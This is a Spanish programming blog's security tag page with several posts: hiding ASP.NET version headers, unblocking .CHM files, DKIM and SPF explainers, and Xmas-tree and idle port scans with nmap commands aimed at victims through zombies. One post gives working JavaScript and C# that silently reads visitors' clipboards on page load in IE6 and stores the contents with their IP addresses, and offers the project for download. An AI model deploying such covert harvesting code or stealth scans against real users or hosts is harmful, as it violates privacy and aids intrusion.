Autor en Google+
Saltar al contenido

Artículos, tutoriales, trucos, curiosidades, reflexiones y links sobre programación web ASP.NET Core, MVC, Blazor, SignalR, Entity Framework, C#, Azure, Javascript... y lo que venga ;)

15 años online

el blog de José M. Aguilar

Inicio El autor Contactar

Artículos, tutoriales, trucos, curiosidades, reflexiones y links sobre programación web
ASP.NET Core, MVC, Blazor, SignalR, Entity Framework, C#, Azure, Javascript...

¡Microsoft MVP!
Mostrando entradas con la etiqueta seguridad. Mostrar todas las entradas
Mostrando entradas con la etiqueta seguridad. Mostrar todas las entradas
miércoles, 23 de septiembre de 2009

Si observamos las respuestas enviadas al cliente que solicita una página de un sitio web creado con el framework MVC, veremos que, además de los encabezados HTTP estándar, el sistema añade información sobre las versiones de ASP.NET y del propio framework MVC que estamos utilizando:

Encabezados X-ASPNet*

Esta información, además de consumir ancho de banda (poco, todo hay que decirlo, pero nada despreciable en sitios con tráfico muy alto), aportan información que posibles atacantes podrían utilizar para sacar provecho a vulnerabilidades conocidas de estos productos. En mi opinión, lo mejor es mostrar los menores detalles posibles al respecto.

Si queremos eliminar la pista correspondiente a la versión de ASP.NET sobre la que corre el sistema (X-AspNet-Version), bastaría con introducir en el web.config la siguiente declaración:

<configuration>
    <system.web>
        <httpRuntime enableVersionHeader="false" />
    </system.web>
</configuration>

Para eliminar, además, la información sobre la versión de ASP.NET MVC framework en ejecución (X-AspNetMvc-Version), tendremos que introducir el siguiente código para que se ejecute durante la inicialización de la aplicación, en el global.asax, indicando así que deseamos deshabilitar el envío de este encabezado:

protected void Application_Start()
{
    [...] // Otro código de inicialización
    MvcHandler.DisableMvcResponseHeader = true;
}

Y con eso basta. El resultado, el que sigue:

Encabezados sin información extra

Publicado en: Variable not found.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

domingo, 21 de diciembre de 2008
Hace tiempo que venía notando que mi equipo del trabajo no podía abrir algunos archivos .CHM. En lugar de mostrar el contenido, habitualmente textos de ayuda de aplicaciones o librerías, me regalaba este bonito error:
"Se canceló la navegación a la página web. Puede intentar lo siguiente: volver a escribir la dirección"

Error en archivo .CHM
El índice de contenidos funcionaba; el alfabético también; incluso la búsqueda por palabras se ejecutaba correctamente, pero sin embargo, al pulsar sobre una sección en el panel izquierdo, aparecía la pantalla anterior en lugar del contenido deseado.

Tras meses culpando al equipo o a la calidad de los archivos que ponen algunos a descargar, por fin me he dado cuenta de que se trata de una medida de seguridad para protegerse de contenidos procedentes de equipos remotos, todos ellos potencialmente diabólicos.

Al parecer, si el archivo de ayuda lo estás abriendo desde una unidad de red, probablemente no te dejará hacerlo, a no ser que indiques a tu equipo que se trata de una fuente de confianza (en el Centro de Ayuda y Soporte de Microsoft puedes encontrar distintas formas de hacerlo, tocando el registro de Windows). La solución más sencilla en este caso sería copiarlo a tu equipo.

Si el archivo de ayuda .CHM te lo has descargado de internet, tu equipo lo habrá bloqueado para evitar que algún código malicioso te cambie los planes del día, así que para acceder a su contenido debes desbloquearlo, accediendo a la opción Propiedades del menú contextual del fichero, y pulsando el botón Desbloquear, como se muestra en la siguiente captura:



Publicado en: www.variablenotfound.com.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

lunes, 24 de diciembre de 2007
Árbol de NavidadPara conocer si un equipo remoto tiene un puerto abierto existen multitud de técnicas. Hace tiempo describí una muy potente llamada idle scan y hoy, haciendo honor a la fecha en que nos encontramos, describiremos el escaneo "Xmas Tree" (árbol de navidad).

Esta técnica consiste en enviar un segmento TCP al puerto deseado del dispositivo a investigar con los bits FIN, URG y PUSH activos. Esto hace que el byte de flags contenga "00101001", lo cual parece ser que recuerda a las luces de un árbol de navidad, y de ahí su nombre. Imaginación y espíritu navideño que no falte. ;-)

Cuando la víctima del escano recibe este segmento, según dictan las directrices marcadas por el protocolo,

  • si el puerto está cerrado, devuelve un segmento con el bit RST activo, indicando que se resetee la conexión en cliente.
  • si el puerto está abierto, ignora el paquete recibido y no responde nada.
Atendiendo a la respuesta (o ausencia de ella), el atacante puede determinar el estado del puerto que está investigando de una forma realmente silenciosa, puesto que no inicia ninguna conexión (como los sondeos SYN, que inician un 3-way-handshake), y sorteando a veces filtros que no esperan este tipo de combinaciones en los flags.

Sin embargo, como aspectos negativos, podemos decir que es bastante sencillo de filtrar y detectar, y que ponen al descubierto la dirección del atacante, por lo cual es conveniente realizarlos desde zombies o intermediarios. También es complicado determinar la veracidad del resultado, puesto que:

  • la respuesta puede ser la misma (o sea, ninguna) si un puerto está abierto o si el paquete ha sido interceptado por un elemento de seguridad (como un firewall).
  • también un puerto puede parecer cerrado sin estarlo debido a una interpretación errónea de la RFC.
En cualquier caso, podemos realizarlo de forma muy sencilla utilizando la herramienta nmap (si usas alguna distribución de linux basada en Debian, como Ubuntu, puedes descargar e instalarla haciendo un apt-get install nmap.). El escaneo lo realizaríamos con la orden (siendo w.x.y.z la dirección IP de la víctima):
nmap -sX w.x.y.z

Ah, por cierto, ¡feliz navidad!

Publicado en: http://www.variablenotfound.com/.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

domingo, 24 de junio de 2007
Hace unos días, visitando Caso Patológico, encontré un código javascript mediante el cual podía obtenerse de forma muy sencilla el contenido del portapapeles del visitante de una página, siempre que éste utilizara un navegador inseguro.

De hecho, si visitáis la página con IE6, podréis observar a la derecha un aviso en el que se advierte de la inseguridad a la que estáis expuestos al utilizarlo, mostrando además parte del contenido de vuestro portapapeles, es decir, lo último que habéis copiado (control+c), por ejemplo desde un editor de textos.

Si combinamos esta idea con la capacidad de ASP.NET AJAX, framework del que ya llevo publicados varios post, para invocar desde cliente funcionalidades en servidor, resulta un proyecto tan simple como interesante: crear una base de datos en servidor con el contenido del portapapeles de los visitantes de una página. Desde el punto de vista tecnológico, vamos a ver cómo podemos utilizar Ajax para comunicar un script cliente con un método de servidor escrito en C#; desde el punto de vista ético, lo que vamos a hacer pertenece un poco al lado oscuro de la fuerza: vamos a enviar al servidor (y éste lo va a almacenar) información importante, que puede llegar a ser muy sensible, sin que el usuario se percate de lo que está ocurriendo.

Para ello crearemos una página ASP.NET en la que introduciremos un código script que, una vez haya sido cargada, obtenga el contenido textual del portapapeles y lo envíe, utilizando un PageMethod, al servidor, quien finalmente introducirá este contenido y la dirección IP del visitante en una base de datos local. Como almacén vamos a usar SQL Express, pero podríamos portarlo fácilmemente a cualquier otro sistema.

Empezaremos desde el principio, como siempre. En primer lugar, recordar que es necesario haberse instalado las extensiones ASP.NET AJAX, descargables gratuitamente en esta dirección. Una vez realiza esta operación, podremos crear en Visual Studio 2005 un sitio web Ajax-Enabled, utilizando una de las plantillas que se habrán instalado en el entorno.

Después de esta operación, el entorno habrá creado por nosotros un sitio web con todas las referencias y retoques necesarios para poder utilizar AJAX. En particular, tendremos un Default.aspx cuyo único contenido es un control de servidor ScriptManager, del que ya hemos hablado en otras ocasiones.

Pues bien, acudiendo al código de la página (.aspx), introducimos ahora el siguiente script:


<script type="text/javascript">
$addHandler(window, "onload", salvaClipboard);
function salvaClipboard()
{
if (window.clipboardData)
{
var msg=window.clipboardData.getData('Text');
if (typeof(msg) != "undefined" &&
(msg != "") && (msg != null))
{
PageMethods.SaveClipboard(msg);
}
}
}
</script>

 

Nótese, en primer lugar, la forma en la que añadimos un handler al evento OnLoad de la ventana. El alias $addHandler, proporcionado por el framework Ajax en cliente, nos facilita la vinculación de funciones a eventos producidos sobre los elementos a los que tenemos acceso desde Javascript.

En segundo lugar, fijaos la forma tan sencilla de obtener el contenido del portapapeles de windows: window.clipboardData.getData('Text');. Los ifs previos y posteriores son simples comprobaciones para que el script no provoque errores en navegadores no compatibles con estas capacidades.

Por último, una vez tenemos en la variable msg el texto, lo enviamos vía un PageMethod al servidor, que lo recibirá en el método estático correspondiente, definido en el code-behind de la misma página (default.aspx.cs). Como hemos comentado en otras ocasiones, es el ScriptManager el que ha obrado el milagro de crear la clase PageMethods e introducir en ella tantos métodos como hayan sido definidos en el servidor y así facilitar su llamada de forma directa desde el cliente.

Vayamos ahora al lado servidor. En el code-behind sólo hemos tenido que incluir el siguiente código en el interior de la clase:


[WebMethod()]
public static void SaveClipboard(string texto)
{
string client =
HttpContext.Current.Request.UserHostAddress;
SqlConnection conn =
new SqlConnection(Settings.Default.ConnStr);
SqlCommand cmd = conn.CreateCommand();
cmd.CommandText = "Insert into Portapapeles "+
"(Ip, Clipboard) Values (@ip, @texto)";
cmd.Parameters.AddWithValue("ip", client);
cmd.Parameters.AddWithValue("texto", texto);
try
{
conn.Open();
cmd.ExecuteNonQuery();
conn.Close();
}
catch (Exception ex)
{
// Nada que hacer!
}
}

 

Simple, ¿eh? La llamada a PageMethod.SaveClipboard en el cliente invoca al método estático del mismo nombre existente en la página del servidor, siempre que éste haya sido adornado con el atributo System.Web.Services.WebMethod. El parámetro "texto", con el contenido del portapapeles del cliente, se recibe como string de forma directa y transparente, sin necesidad de hacer ninguna conversión ni operación extraña.

Una vez obtenida también la IP del visitante usando el HttpContext (hay que recordar que el método es estático y por tanto no tiene acceso a las propiedades de la propia página donde está definido), se establece la conexión con la base de datos y se almacena la información.

Y eso es todo, amigos. Como habéis podido comprobar, es realmente sencillo utilizar Ajax para enviar desde el cliente información al servidor utilizando scripting y el framework AJAX proporcionado por Microsoft. Si esto lo unimos a la capacidad de extraer información local del equipo del visitante en determinados navegadores, los resultados pueden ser espectaculares y realmente peligrosos. Afortunadamente, las nuevas generaciones de browsers (IE7 incluido) se toman la seguridad algo más en serio y hacen más difícil la explotación de este tipo de funciones.

Finalmente, como siempre, indicar que he dejado en Snapdrive el proyecto completo, base de datos incluida, para que podáis probarlo (AjaxClipboardSpy.zip). Ojo, para que todo funcione debéis cambiar la ruta del archivo .MDF de SQL Express sobre el archivo Settings.settings de la aplicación.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

viernes, 25 de mayo de 2007
El pasado 22 de mayo, la IETF aprobó y publicó la propuesta del estándar DKIM en la RFC 4871. ¡Diantres, ahora que se había puesto de acuerdo mucha gente para usar SPF!

DKIM pretende controlar los mensajes haciendo que el servidor de correo del que proceden firme digitalmente los envíos. De esta forma se consigue, en primer lugar, poder verificar el dominio al que pertenece el remitente de un mensaje y, en segundo lugar, asegurar la integridad del mismo permitiendo detectar si el contenido de éste ha sido alterado durante su tiempo de tránsito por el ciberespacio.

Según proponen, para echar a andar DKIM en un servidor de mensajes SMTP, deberían generarse un par de claves, pública y privada. La primera de ellas sería publicada a través del servicio estándar DNS, mientras que la segunda sería utilizada internamente para firmar digitalmente los mensajes.

Cuando un usuario autorizado envía un correo, el servidor generaría la firma del contenido en tiempo real y la añadiría a los encabezados del mensaje. El servidor del destinatario extraería la firma del mensaje y, mediante una consulta al DNS del origen, obtendría su clave pública, con lo que podría verificar la validez de la firma.

De esta forma, en función del resultado de la comprobación, el destinatario podría aplicar políticas locales de filtrado. Por ejemplo, si el dominio origen del mensaje existe y la firma es válida, es probable que se trate de un mensaje que debe ser entregado al destinatario, pero se le podrían pasar filtros basados en contenido para una mayor seguridad. Si la firma no es correcta o no aparece, podrían tomarse medidas de descarte o marcado del mensaje.
El siguiente diagrama muestra esquemáticamente el funcionamiento de DKIM:



¿Y quién anda detrás de este invento? Pues ni más ni menos que Yahoo! (iniciadores del proyecto), Cisco, PGP y Sendmail, y según comenta su inventor, Mark Delany, también han contado con la colaboración de IBM, Earthlink, Microsoft, Spamhaus, Google, PayPal y Alt-N, entre otros.

En resumen, se trata de un nuevo intento para acabar con el envío de mensajes desde destinatarios incorrectos o servidores "no creíbles", basándose esta vez en la utilización de criptografía de clave pública. Si bien no es de por sí una tecnología que resuelva el problema al 100%, sí que podría colaborar mucho. Además, lo más probable es que la solución final sea una combinación de distintas técnicas, así que bienvenida sea.

Particularmente me convence la idea de aplicar técnicas criptográficas para asegurar el correo, así como la utilización de estándares y soluciones colaborativas consensuada entre proveedores. Sin embargo, este último aspecto es su punto más débil: necesita una adopción global para que su efectividad pueda ser razonable.

En cualquier caso, todo esto forma parte de la lógica y necesaria evolución de tecnologías que tiene que acontecer hasta que la humanidad consiga dar con la forma para la eliminación definitiva del spam, phishing, spoofing y otras lindezas virtuales.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

lunes, 7 de mayo de 2007
En un post anterior comentaba los fundamentos de la técnica de escaneo de puertos conocida como idle scan, pero no incluí cómo llevarlo a la práctica.

Nada más sencillo. Suponiendo que partimos de un linux basado en Debian, como Ubuntu, basta con descargar e instalar nmap:

apt-get install nmap

Una vez contando con esta herramienta, para realizar un escaneo al host [victima] a través del zombie [zombie] la instrucción sería la siguiente:

nmap –sI [zombie] –P0 [victima]

Donde:
  • "-sI" indica que se debe realizar el idle scan.
  • [zombie] es la dirección, en forma de IP o nombre, del equipo elegido como zombie.
  • "-P0" indica que no se debe realizar un ping directo para comprobar si la víctima está activo.
  • [victima] es la dirección, IP o nombre, de la misma.
  • opcionalmente, puede indicarse el parámetro "-p" seguido de los números de puerto a escanear, por defecto nmap hará un barrido bastante completo y puede tardar un poco. Ante la duda, un "man nmap" puede venir bien.

Pero ojo, no es fácil dar con servidores que cumplan los requisitos necesarios para ser considerados buenos zombies, puesto que en la mayoría se usan IPIDs aleatorizados, fijos o secuencias por cliente.

Además, recordad que debéis ser root (o ejecutar las órdenes con sudo) para que todo funcione correctamente.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

domingo, 22 de abril de 2007
Hoy me voy a salir un poco de la temática habitual, relacionada con el mundo del desarrollo, para comentar una técnica de escaneo de puertos que me ha llamado mucho la atención por el ingenio que derrochó su inventor, Salvatore antirez Sanfilippo, en el año 1998.

Se trata de idle scan, una ocurrente forma para detectar los puertos abiertos en una máquina remota sin poner al descubierto al atacante, es decir, al equipo que realiza el escaneo. Para ello, se vale de una máquina intermedia, llamada zombie o dumb, que ejerce como intermediario en la comunicación y hace que en ningún caso la víctima reciba paquetes directamente desde el atacante, quedando éste en el más absoluto anonimato.

Bueno, he de decir que si no tienes claro el funcionamiento del protocolo TCP y el establecimiento de conexiones, es probable que debas pegar un repaso antes de seguir leyendo el post. En todo caso será una lectura aconsejable para todo humano interesado en saber qué está ocurriendo por debajo cuando estamos utilizando servicios en una red como Internet.

Ahora vamos al lío. La cuestión es que todo intrépido pirata sabe que antes de iniciar el ataque a una ciudad costera es conveniente ver los puertos en los que se puede atracar para hacer el desembarco, ¿no? Pues en Internet ocurre lo mismo, un puerto abierto en un equipo conectado a la red es siempre una posible vía de entrada al mismo; indica que hay una aplicación escuchando en la máquina, y habitualmente puede averiguarse cuál es y explotar sus debilidades.

Por tanto, un ataque tipo debería ir precedido de un escaneo de los puertos abiertos, es decir, recorrer los 65535 puertos posibles (o al menos el subconjunto de uso más habitual) a ver cuáles están en uso. La pega es que esto suele ser demasiado ruidoso, no son pocos los sistemas de detección de intrusos y filtros que detectan peticiones sucesivas desde una misma dirección y las clasifican de inmediato como sospechosas pudiendo llegar a banear (prohibir) la conexión desde la IP que está haciendo el barrido, o incluso a registrar la dirección para más adelante poder tomar medidas legales si procede.

Esta es la razón que hacen de Idle Scan una técnica interesante, puesto que, como he comentado antes, en ningún momento el atacado es consciente de la dirección del atacante.

Para ello se aprovecha, en primer lugar, el funcionamiento del three way handshake, el protocolo estándar utilizado para el establecimiento de conexiones TCP, donde de forma habitual:
  • El procedimiento se inicia cuando el cliente envía un paquete SYN al servidor. Si es posible realizar una conexión, éste responde con un SYN + ACK, y el cliente debe confirmar enviando de nuevo un ACK al servidor. En caso contrario, es decir, si no es posible realizar la conexión porque el puerto esté cerrado, el servidor responde con un RST y se da por finalizada la secuencia.
  • Si un host, sin haberlo solicitado previamente, recibe un paquete de confirmación de conexión SYN+ACK de otro, responde con un RST con objeto de informarle de que no va a establecerse conexión alguna.
  • Si un host, sin haberlo solicitado previamente, recibe un paquete de reseteo (RST), lo ignora.
En segundo lugar, y es la parte importante, Idle Scan utiliza una característica de determinadas implementaciones de la pila TCP/IP, la numeración de paquetes salientes IP de forma consecutiva, principalmente con objeto de que, en el caso de que deban ser fragmentados, el destinatario pueda determinar a qué paquete pertenece cada fragmento. Al número identificativo de un paquete se le conoce como IPID.

Para detectar si un puerto está abierto o cerrado, es necesario primero observar el IPID del zombie, enviar paquetes a la víctima haciéndole ver que realmente se los está enviando éste y, posteriormente, observar de nuevo el IPID utilizado por el incauto intermediario. En función de los valores iniciales y finales obtenidos, se puede inferir el estado del puerto destino.

A continuación se exponen dos escenarios distintos de escaneo; en el primero de ellos se muestra lo que ocurre cuando el puerto objeto de la detección está abierto, mientras que en el segundo se supone que está cerrado.

Escenario 1: Víctima con el puerto abierto

El primer paso es enviar al zombie un paquete SYN+ACK, con objeto de que éste nos devuelva el paquete RST correspondiente, del cual tomaremos el IPID.

Acto seguido, se realiza una solicitud de conexión a la víctima, previa manipulación del paquete para que sea el zombie el que figure como origen del mismo. Al recibirlo, dado que estamos asumiendo que el puerto está abierto (escenario 1), la víctima envía de vuelta la confirmación de la conexión al que cree que es el solicitante, el zombie.

El zombie recibe la confirmación de la conexión, pero como no es él el que la ha generado, responde a la víctima con una señal de reseteo (RST), incrementando su IPID.

De nuevo, pasado unos segundos, desde el atacante se vuelve a obtener el IPID del zombie de la misma forma que al comienzo, comprobando que ha sido incrementado en 2 unidades. De esta forma, se determina que el puerto destino del escaneo estaba abierto.

El siguiente diagrama muestra la secuencia forma gráfica:




Escenario 2: Víctima con el puerto cerrado

Como en el escenario anterior, el primer paso siempre es obtener el IPID del zombie, enviándole un paquete SYN+ACK, con objeto de que éste nos devuelva el paquete RST correspondiente.

De la misma forma, se envía a la víctima el paquete de solicitud de conexión, indicando en las cabeceras que el origen del mismo es el host zombie. Dado que el puerto está cerrado (escenario 2), la víctima devuelve al aparente emisor un paquete RST indicándole que no será posible establecer la conexión solicitada. El zombie recibe el paquete RST y lo ignora.

El atacante, siguiendo la misma técnica que en otras ocasiones, obtiene el IPID del zombie, y dado que es el número siguiente al recibido al iniciar el procedimiento, puede determinar que no ha realizado ningún envío entre ambos, y que, por tanto, el puerto de destino estaba cerrado.


Desde el punto de vista del atacante las ventajas son, fundamentalmente:

  • El anonimato, puesto que desde la víctima todas las conexiones provienen virtualmente del zombie, y en ningún momento se envía información directamente desde el atacante.
  • El alcance, es decir, esta técnica permite escanear puertos de máquinas a las que directamente no se tendría acceso debido a la acción de filtros (como firewalls) intermedios. Dado que las conexiones provienen del zombie, sólo habría que tener acceso a éste para realizar el escaneo.
  • La visión de red que aporta, en otras palabras, permite determinar las relaciones de confianza existentes entre el zombie y la víctima. Si, por ejemplo, un intento directo de conexión a un puerto de la víctima es rechazado y, sin embargo, es posible acceder a él desde un intermediario, es porque existe algún tipo de relación de confianza entre ambos, lo cual puede ser utilizado en ataques posteriores.

En la actualidad, el principal inconveniente es la dificultad de localizar un zombie apropiado para realizar los ataques, tanto por las condiciones software que debe cumplir (sistemas operativos, kernels, etc.), el escaso tráfico de red que debe tener en el momento del escaneo (necesarios para que los IPID no se incrementen por otras conexiones) y, sobre todo, las medidas de seguridad de que disponga, puesto que desde él sería posible detectar al atacante.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons

domingo, 8 de abril de 2007
Vía una entrada en Barrapunto, llego a un artículo en el País titulado "Proveedores de Internet se unen contra el correo basura" donde se recoge la noticia de que los 26 principales proveedores españoles se han puesto de acuerdo en utilizar SPF para luchar contra el spam. Lógico, teniendo en cuenta que sólo un 15% de los mensajes que pululan por sus servidores y redes son reales, lo que indica que la mayor parte de sus recursos están siendo utilizados por el lado oscuro.

SPF (Sender Policy Framework) es una especificación experimental publicada por la IETF en la RFC 4408 (abril 2006), y describe un conjunto de técnicas para evitar la utilización de dircciones de email falsas en los mensajes que circulan por la red.

Aunque creo que esto ya lo he comentado en otras ocasiones, uno de los principales problemas que hacen florecer el spam, scam, phishing, y alguna que otra atrocidad más, es la inocencia con la que fue creado el protocolo SMTP, utilizado para los envíos de mensajes de correo electrónico entre servidores. En este estándar no se establece ninguna técnica para asegurar la veracidad del remitente, por lo que cualquiera puede escribir en nombre de otro, hacerse pasar por quien desee, o simplemente inventar sobre la marcha un emisor, existente o no.

Por eso los mensajes de spam que recibimos pueden provenir incluso de personas que conocemos, pertenecientes a nuestro propio dominio, compañeros que tenemos sentados justo a nuestro lado, etc.

El SPF pretende acabar con esto, pues define un sistema de comprobación en tiempo real de la veracidad del remitente, así como del servidor desde el que se envía un mensaje, consistente, por una parte, en incluir en los registros MX de cada dominio emisor de correos una línea donde se indique la dirección IP desde la que pueden ser enviados. De esta forma, cuando otro servidor SMTP recibe un mensaje con un remitente del dominio anterior, puede consultar esos registros y comprobar si la IP desde la que está recibiendo el email está autorizada para enviarlo.

Lo vemos con un ejemplo real, por suerte (?) tengo bastantes para elegir. Hoy he recibido un correo desde la dirección finkenhoferqov0@hotmail.com aconsejándome soluciones para mis terribles problemas de erección (¿cómo se habrán enterado? :-D). Por suerte, según me indican, la mitad de los varones los sufren, el que no se consuela es porque no quiere.

Si rastreo el mensaje, veo que ha llegado a mi servidor desde la dirección IP 71.186.100.38, cuyo nombre parece ser pool-71-186-100-38.chi01.dsl-w.verizon.net. Si seguimos escarbando, podemos obtener la siguiente información de esta IP:

OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US
NetRange: 71.160.0.0 - 71.191.255.255
CIDR: 71.160.0.0/11
NetName: VIS-BLOCK

Y aunque las herramientas de geoposicionamiento de direcciones IP no son el colmo de la precisión, podríamos incluso atrevernos a conjeturar dónde se encuentra el spammer, en Washington.

A la vista de estos datos, se trata de un equipo que utiliza una dirección IP dinámica, conectado a través de una DSL que, de forma voluntaria o no, está enviando spam, cual poseso, al resto del mundo. Está claro que ningún spammer decente dejaría ver todos sus datos así, por lo que, o bien se trata de un PC secuestrado (zombie), o bien toda la información que deja ver es falsa.

En cualquier caso, está claro que no se trata de Hotmail, de donde era, como recordaréis, el remitente del mensaje.

Si tanto mi servidor como Hotmail utilizaran SPF, se habría rechazado el mensaje de forma directa. Al recibir la dirección del remitente, habría acudido a los registros MX de Hotmail para averiguar si la IP desde la que se ha producido la conexión es válida para envíos @hotmail.com, y, obviamente, de esta comprobación siempre se determinaría que el emisor es inválido.

Todo esto está muy bien, personalmente creo bastante en este tipo de soluciones colaborativas y de consenso para luchar contra el spam, más incluso que en las de análisis de contenido que, como ya he comentado en posts anteriores, tienen bastantes dificultades para garantizar el filtrado correcto dada la gran variedad de trucos utilizados.

El problema es precisamente su implementación en la práctica, y eso que en el caso del SPF no es especialmente compleja, todo lo contrario. Está claro que si todos los ISP del mundo utilizaran este método, el spam, fishing y en general cualquier historia basada en la utilización de remitentes falsos tendrían los días contados... al menos en la forma en que hoy los conocemos, claro.

Estos contenidos se publican bajo una licencia de Creative Commons Licencia Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 España de Creative Commons